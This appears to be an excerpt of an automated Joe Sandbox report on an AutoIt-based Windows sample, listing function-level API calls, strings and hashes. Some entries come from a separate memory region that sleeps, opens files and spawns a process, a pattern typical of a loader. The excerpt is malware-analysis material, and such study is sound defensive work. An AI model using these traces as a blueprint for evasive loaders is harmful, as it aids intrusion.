                                                                                                                    • Opcode Fuzzy Hash: bb3243c1e2c2fcb8ed1952cfa82235b4900fe14fa395d8f2ec15d177d76345ae
                                                                                                                    • Instruction Fuzzy Hash: 424159B1230906BFDB2AEF24DC49BF9375CEB00380F940525F506D62A2CFE49DB0A665

Control-flow Graph

APIs
• GetSysColorBrush.USER32(0000000F), ref: 002B3A50
• LoadCursorW.USER32(00000000,00007F00), ref: 002B3A5F
• LoadIconW.USER32(00000063), ref: 002B3A76
• LoadIconW.USER32(000000A4), ref: 002B3A88
• LoadIconW.USER32(000000A2), ref: 002B3A9A
• LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 002B3AC0
• RegisterClassExW.USER32(?), ref: 002B3B16
  • Part of subcall function 002B3041: GetSysColorBrush.USER32(0000000F), ref: 002B3074
  • Part of subcall function 002B3041: RegisterClassExW.USER32(00000030), ref: 002B309E
  • Part of subcall function 002B3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 002B30AF
  • Part of subcall function 002B3041: InitCommonControlsEx.COMCTL32(?), ref: 002B30CC
  • Part of subcall function 002B3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002B30DC
  • Part of subcall function 002B3041: LoadIconW.USER32(000000A9), ref: 002B30F2
  • Part of subcall function 002B3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 002B3101
Strings
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
• String ID: #$0$AutoIt v3
• API String ID: 423443420-4155596026
• Opcode ID: 9ec4e07afcf17d106bc96555054a9fd932ec3ab81336e5cc238f8909ed0dea03
• Instruction ID: c1b6278eb48858528ef54cdca5955017b9fa5644063cffddc0f03dfcd2969df8
• Opcode Fuzzy Hash: 9ec4e07afcf17d106bc96555054a9fd932ec3ab81336e5cc238f8909ed0dea03
• Instruction Fuzzy Hash: 1D214D70D10304AFEB26DFA4EC49B9D7BF9FB08751F10091AE608A62A2D7F655909F84

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
• String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$R7
• API String ID: 1825951767-761371267
• Opcode ID: de2720bd6329737929db2b381045296deca83afbd0e18396c3f88cba4a42517c
• Instruction ID: b26f58b54c4a05a9f4f3b5a8580adda883b9efc9f5dd887244d9a38d19c61e01
• Opcode Fuzzy Hash: de2720bd6329737929db2b381045296deca83afbd0e18396c3f88cba4a42517c
• Instruction Fuzzy Hash: 2CA17C71D2021D9ADF15EBA0DC95AEEB778BF14380F44042AF415B7192EF74AA58CFA0

Control-flow Graph

APIs
  • Part of subcall function 002D0162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 002D0193
  • Part of subcall function 002D0162: MapVirtualKeyW.USER32(00000010,00000000), ref: 002D019B
  • Part of subcall function 002D0162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 002D01A6
  • Part of subcall function 002D0162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 002D01B1
  • Part of subcall function 002D0162: MapVirtualKeyW.USER32(00000011,00000000), ref: 002D01B9
  • Part of subcall function 002D0162: MapVirtualKeyW.USER32(00000012,00000000), ref: 002D01C1
  • Part of subcall function 002C60F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,002BF930), ref: 002C6154
• GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 002BF9CD
• OleInitialize.OLE32(00000000), ref: 002BFA4A
• CloseHandle.KERNEL32(00000000), ref: 002F45C8
Strings
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
• String ID: <W7$\T7$%4$S7
• API String ID: 1986988660-1010537161
• Opcode ID: 3a26eb5b0d1c5dc265dbd551293b67fcf0797dfe50c96f2d7326f8e7b5acb21c
• Instruction ID: 5c167ff676957e09f779a305237569d895fa88a2b705af94627f53da6f2f4974
• Opcode Fuzzy Hash: 3a26eb5b0d1c5dc265dbd551293b67fcf0797dfe50c96f2d7326f8e7b5acb21c
• Instruction Fuzzy Hash: CA81BDB4911A80CEE3BEDF2AA9456597BEDEB99306F90852E900DCB271E7F444C5CF10

Control-flow Graph

APIs
• CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0116929D
Memory Dump Source
• Source File: 00000000.00000002.2094043687.0000000001168000.00000040.00000020.00020000.00000000.sdmp, Offset: 01168000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1168000_6BRa130JDj.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
• Instruction ID: e9eaf53d896ddd5863d9b8e5ff136f976ec1c0faebb5ddef9300486cd1017c8a
• Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
• Instruction Fuzzy Hash: 4151F575A50208FFEF24DFA4CC49FEE7778AF48705F108558F60AAA180DB759645CB60

Control-flow Graph

APIs
• CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 002B3A03
• CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 002B3A24
• ShowWindow.USER32(00000000,?,?), ref: 002B3A38
• ShowWindow.USER32(00000000,?,?), ref: 002B3A41
Strings
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: Window$CreateShow
• String ID: AutoIt v3$edit
• API String ID: 1584632944-3779509399
• Opcode ID: 4a1a8d8a4d1328e4faf76af352111efe92d0f6becce8b6ed1de4f6cb0cbecf5e
• Instruction ID: 9ad01a35aa0a0c7de8854ff6a4c719cb15bcd481313074ebd329fdc5103dcaa8
• Opcode Fuzzy Hash: 4a1a8d8a4d1328e4faf76af352111efe92d0f6becce8b6ed1de4f6cb0cbecf5e
• Instruction Fuzzy Hash: 3CF03A709002907EEA3257236C89E6B2E7DD7C6F50F00042EFA08A2271C6A10880DAB0

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1443 2b407c-2b4092 1444 2b4098-2b40ad call 2b7a16 1443->1444 1445 2b416f-2b4173 1443->1445 1448 2ed3c8-2ed3d7 LoadStringW 1444->1448 1449 2b40b3-2b40d3 call 2b7bcc 1444->1449 1452 2ed3e2-2ed3fa call 2b7b2e call 2b6fe3 1448->1452 1449->1452 1453 2b40d9-2b40dd 1449->1453 1461 2b40ed-2b416a call 2d2de0 call 2b454e call 2d2dbc Shell_NotifyIconW call 2b5904 1452->1461 1465 2ed400-2ed41e call 2b7cab call 2b6fe3 call 2b7cab 1452->1465 1455 2b40e3-2b40e8 call 2b7b2e 1453->1455 1456 2b4174-2b417d call 2b8047 1453->1456 1455->1461 1456->1461 1461->1445 1465->1461
                                                                                                                    APIs
                                                                                                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 002ED3D7
                                                                                                                      • Part of subcall function 002B7BCC: _memmove.LIBCMT ref: 002B7C06
                                                                                                                    • _memset.LIBCMT ref: 002B40FC
                                                                                                                    • _wcscpy.LIBCMT ref: 002B4150
                                                                                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 002B4160
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                                                                    • String ID: Line:
                                                                                                                    • API String ID: 3942752672-1585850449
                                                                                                                    • Opcode ID: 8a8acb037c98305a03886e5e455416303a6b772a0755525a90df54e3710cf065
                                                                                                                    • Instruction ID: 2dc2b460a9c8e2801483f3d9f51fc0ecf7e357f5c9268bd72c0a2a8bb7aeb7fa
                                                                                                                    • Opcode Fuzzy Hash: 8a8acb037c98305a03886e5e455416303a6b772a0755525a90df54e3710cf065
                                                                                                                    • Instruction Fuzzy Hash: E831E131428301AFD335FB60DC85FDA77ECAF50340F10491AF58992092DBB0A6A8CB82

                                                                                                                     Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed)
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1559183368-0
                                                                                                                    • Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                                                                                    • Instruction ID: ef7e4292e3abb9495ec898da5de770ff41e44235f8b649e3b8cc37bf28da6de5
                                                                                                                    • Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                                                                                    • Instruction Fuzzy Hash: AF51D830A20B16DBDB258F69D88066E77A6AF40320F64872BF825963D0D7F1DDB08F41
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B4DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,003752F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 002B4E0F
                                                                                                                    • _free.LIBCMT ref: 002EE263
                                                                                                                    • _free.LIBCMT ref: 002EE2AA
                                                                                                                      • Part of subcall function 002B6A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 002B6BAD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$CurrentDirectoryLibraryLoad
                                                                                                                    • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                                                    • API String ID: 2861923089-1757145024
                                                                                                                    • Opcode ID: 835c00c44ee77c90b015f25885cf69613e22283ee834b261a4abdd63fb41131f
                                                                                                                    • Instruction ID: 9fad2a77162eb878343a2b32ab5d6f2aa1c9dc299fed311e91db6c29b1b8c33e
                                                                                                                    • Opcode Fuzzy Hash: 835c00c44ee77c90b015f25885cf69613e22283ee834b261a4abdd63fb41131f
                                                                                                                    • Instruction Fuzzy Hash: 9A919C7192025AAFCF05EFA5C8819EDB7B8FF09350F44442AF815AB2A1DB70AD65CF50
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0116ABE8: Sleep.KERNELBASE(000001F4), ref: 0116ABF9
                                                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0116AE38
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2094043687.0000000001168000.00000040.00000020.00020000.00000000.sdmp, Offset: 01168000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_1168000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFileSleep
                                                                                                                    • String ID: KRV2PF9C8GEH0K6C8S2VX7L520
                                                                                                                    • API String ID: 2694422964-1144677494
                                                                                                                    • Opcode ID: 6556174188aace0adfe0772f65696f64c58f3e3db47d24d4402cd781efe6e34b
                                                                                                                    • Instruction ID: d2c833c36095a9c4e69d28f849f13f8dca97172770a4fe6d5dce15d6d1c59c23
                                                                                                                    • Opcode Fuzzy Hash: 6556174188aace0adfe0772f65696f64c58f3e3db47d24d4402cd781efe6e34b
                                                                                                                    • Instruction Fuzzy Hash: 3261A370D04288DBEF15DBB4D854BEEBBB8AF15304F044199E2487B2C1D7BA1B49CB66
                                                                                                                    APIs
                                                                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,002B35A1,SwapMouseButtons,00000004,?), ref: 002B35D4
                                                                                                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,002B35A1,SwapMouseButtons,00000004,?,?,?,?,002B2754), ref: 002B35F5
                                                                                                                    • RegCloseKey.KERNELBASE(00000000,?,?,002B35A1,SwapMouseButtons,00000004,?,?,?,?,002B2754), ref: 002B3617
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                    • String ID: Control Panel\Mouse
                                                                                                                    • API String ID: 3677997916-824357125
                                                                                                                    • Opcode ID: d3d484723adc5c6ce137b7e6d6d22cc01081acdf811ba0c89af85e50a6892fb4
                                                                                                                    • Instruction ID: f0d5e4fa558c64a47a95372e2b6a31db996d8bdd9e7d33acbf67787f263ca491
                                                                                                                    • Opcode Fuzzy Hash: d3d484723adc5c6ce137b7e6d6d22cc01081acdf811ba0c89af85e50a6892fb4
                                                                                                                    • Instruction Fuzzy Hash: 0D1148B5920208BFDB21CF68DC80AEEB7BCEF04780F005469E805D7210D2719E609764
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B4EE5: _fseek.LIBCMT ref: 002B4EFD
                                                                                                                      • Part of subcall function 00319734: _wcscmp.LIBCMT ref: 00319824
                                                                                                                      • Part of subcall function 00319734: _wcscmp.LIBCMT ref: 00319837
                                                                                                                    • _free.LIBCMT ref: 003196A2
                                                                                                                    • _free.LIBCMT ref: 003196A9
                                                                                                                    • _free.LIBCMT ref: 00319714
                                                                                                                      • Part of subcall function 002D2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,002D9A24), ref: 002D2D69
                                                                                                                      • Part of subcall function 002D2D55: GetLastError.KERNEL32(00000000,?,002D9A24), ref: 002D2D7B
                                                                                                                    • _free.LIBCMT ref: 0031971C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1552873950-0
                                                                                                                    • Opcode ID: 57d0d2f04a8deae04fb8388104c663c78e861137db03f429770e89b5c3a69279
                                                                                                                    • Instruction ID: 121824b4c9348d1951f16e82c59d229563d9d814a262f44a93a273b4d16a6702
                                                                                                                    • Opcode Fuzzy Hash: 57d0d2f04a8deae04fb8388104c663c78e861137db03f429770e89b5c3a69279
                                                                                                                    • Instruction Fuzzy Hash: A5513DB1914258AFDF299F64CC81AEEBB7AEF48340F10449EB609A7341DB715A90CF58
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2782032738-0
                                                                                                                    • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                                                                    • Instruction ID: c7300264d6d95afa1bc1ead20d36b61613f3e13a1ae68ada9a3263b25cdc6360
                                                                                                                    • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                                                                    • Instruction Fuzzy Hash: C641D634A207469BEF18EF69CC809AEB7A6EF453A4B24813FE819C7740D770DD609B40
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 002B44CF
                                                                                                                      • Part of subcall function 002B407C: _memset.LIBCMT ref: 002B40FC
                                                                                                                      • Part of subcall function 002B407C: _wcscpy.LIBCMT ref: 002B4150
                                                                                                                      • Part of subcall function 002B407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 002B4160
                                                                                                                    • KillTimer.USER32(?,00000001,?,?), ref: 002B4524
                                                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 002B4533
                                                                                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 002ED4B9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1378193009-0
                                                                                                                    • Opcode ID: 5093fba244b659ec87228d1360fc7c99f1144d4fb72480f5b69f0c03958fa701
                                                                                                                    • Instruction ID: ab9d842af954d8bfbdf72f59448fc96fd8da29a7617d64b533265a1b2bd85f3c
                                                                                                                    • Opcode Fuzzy Hash: 5093fba244b659ec87228d1360fc7c99f1144d4fb72480f5b69f0c03958fa701
                                                                                                                    • Instruction Fuzzy Hash: 532107709547849FEB339F248885BE6BBECAF21344F44049DE6CE56182C3B42994DB51
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: _memmove
• String ID: AU3!P/4$EA06
• API String ID: 4104443479-3315824915
• Opcode ID: cf20dd99b68a744d9ab2001b4c15a6e6237f7ec83411361d14785738a683dea9
• Instruction ID: 1d4c1c82888e961e09f605195dcb2c33686322c05092db450b9b1776fec5015b
• Opcode Fuzzy Hash: cf20dd99b68a744d9ab2001b4c15a6e6237f7ec83411361d14785738a683dea9
• Instruction Fuzzy Hash: 7A416B21A2415A67CF22BF54C8E17FE7FB29B45380F684465EC829B283D6609D6487A1
APIs
• _memset.LIBCMT ref: 002EEA39
• GetOpenFileNameW.COMDLG32(?), ref: 002EEA83
  • Part of subcall function 002B4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002B4743,?,?,002B37AE,?), ref: 002B4770
  • Part of subcall function 002D0791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 002D07B0
Strings
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: Name$Path$FileFullLongOpen_memset
• String ID: X
• API String ID: 3777226403-3081909835
• Opcode ID: fbf3cffd04f0d9795ced78af0f71da17b592c1034414ff4b2cf6f52ff67f8565
• Instruction ID: 2aa9413767a8a25dd556aa485dbcf716b9a65601c4924ecf2e45dc7964965e33
• Opcode Fuzzy Hash: fbf3cffd04f0d9795ced78af0f71da17b592c1034414ff4b2cf6f52ff67f8565
• Instruction Fuzzy Hash: 1D21C630A202889BDF019F94D845BDE7BF9AF48314F00405AE408A7341DBF45999CFA1
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: __fread_nolock_memmove
• String ID: EA06
• API String ID: 1988441806-3962188686
• Opcode ID: af35595357df78430ca253adad330c3666692f17705ba7488bc0b886c6bbc037
• Instruction ID: 53b28e365d5af8f2702eb89f2fb8efaef4a0394ae3564ea80d2fd6e9425431dc
• Opcode Fuzzy Hash: af35595357df78430ca253adad330c3666692f17705ba7488bc0b886c6bbc037
• Instruction Fuzzy Hash: C301F9718042187EDB19CBA8D856EEE7BFCDB15301F00419FF552D2281E9B4EA148BA0
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 0116997D
• ExitProcess.KERNEL32(00000000), ref: 0116999C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2094043687.0000000001168000.00000040.00000020.00020000.00000000.sdmp, Offset: 01168000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1168000_6BRa130JDj.jbxd
Similarity
• API ID: Process$CreateExit
• String ID: D
• API String ID: 126409537-2746444292
